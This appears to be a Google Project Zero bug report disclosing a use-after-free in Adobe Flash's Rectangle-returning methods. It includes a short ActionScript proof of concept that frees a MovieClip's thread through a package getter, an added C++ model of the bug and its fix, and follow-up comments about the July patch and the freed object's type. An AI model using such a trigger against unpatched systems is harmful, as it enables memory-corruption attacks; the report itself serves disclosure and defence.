Adobe Flash: Use-after-free when returning Rectangle

Project Member Reported by natashenka@google.com, Jun 9 2016
Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed. A minimal PoC is as follows:

    // create a MovieClip so the native method runs on its thread
    var mc = this.createEmptyMovieClip("mc", 1);
    mc.scrollRect = {x : 0, y : 0, height : 10, width : 10};
    var r = flash.geom.Rectangle;
    var g = flash.geom;
    // install a getter on the package, invoked when the constructor is fetched
    g.addProperty("Rectangle", func, func);
    var f = ASnative(900, 405); // scrollRect
    mc.f = f;
    mc.f();
    function func() {
        mc.removeMovieClip(); // frees the thread the native method is running on
        // fix heap
        return r;
    }
A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
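The hazard described in the report, modelled as an added example (not code from the report or from Adobe's player): a native method resolves a constructor by name, that lookup can run a script-defined getter, and the getter may tear down the MovieClip that owns the calling thread. The refcounted Thread, MovieClip, lookupRectangleCtor and the two scrollRect variants are hypothetical stand-ins; the hardened variant shows the usual fix of pinning the owner before any call that can re-enter script.

```cpp
// Added example: a refcounted model of the re-entrancy bug described above.
// All types and functions are hypothetical, not the player's real internals.
#include <functional>
#include <memory>

struct Thread {
    int id = 0;
};

struct MovieClip {
    // The clip owns the thread that native methods called on it run on.
    std::shared_ptr<Thread> thread = std::make_shared<Thread>();
    // removeMovieClip() drops the owner's reference; if nothing else holds
    // one, the Thread is destroyed here, as the report describes.
    void removeMovieClip() { thread.reset(); }
};

// A script-visible getter hook, installed like addProperty("Rectangle", ...).
using Getter = std::function<void(MovieClip&)>;

// Constructed getter mirroring the PoC's func(): it removes the clip.
const Getter kRemoveOwner = [](MovieClip& mc) { mc.removeMovieClip(); };

// Resolving "flash.geom.Rectangle" may invoke a user getter before returning.
static void lookupRectangleCtor(MovieClip& mc, const Getter& getter) {
    if (getter) getter(mc);
}

// Vulnerable shape: the native code keeps only an unowned pointer to the
// thread across the lookup. A weak_ptr stands in for that raw pointer so the
// example can report the dangling state instead of touching freed memory.
// Returns false when the constructor would run on a freed thread.
bool scrollRectVulnerable(MovieClip& mc, const Getter& getter) {
    std::weak_ptr<Thread> t = mc.thread;
    lookupRectangleCtor(mc, getter);  // may run removeMovieClip()
    return !t.expired();
}

// Hardened shape: take a strong reference before anything that can run
// script, so removeMovieClip() cannot free the thread mid-call.
// Returns true when the thread is still valid after the lookup.
bool scrollRectHardened(MovieClip& mc, const Getter& getter) {
    std::shared_ptr<Thread> keep = mc.thread;
    lookupRectangleCtor(mc, getter);  // getter runs, but the thread survives
    return keep != nullptr;
}
```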
Aug 25 2016
Fixed in July update
Sep 8 2016
Hey Natalie, I had a quick question regarding the object being freed here. At the crash, the program is attempting to access a freed object; this is clear. But how were you able to confirm that this object is a thread object and not a MovieClip object in memory? I cannot seem to determine the object type from the vftable of the freed object. Perhaps there is some open source component in https://github.com/adobe-flash/avmplus that you can point me to?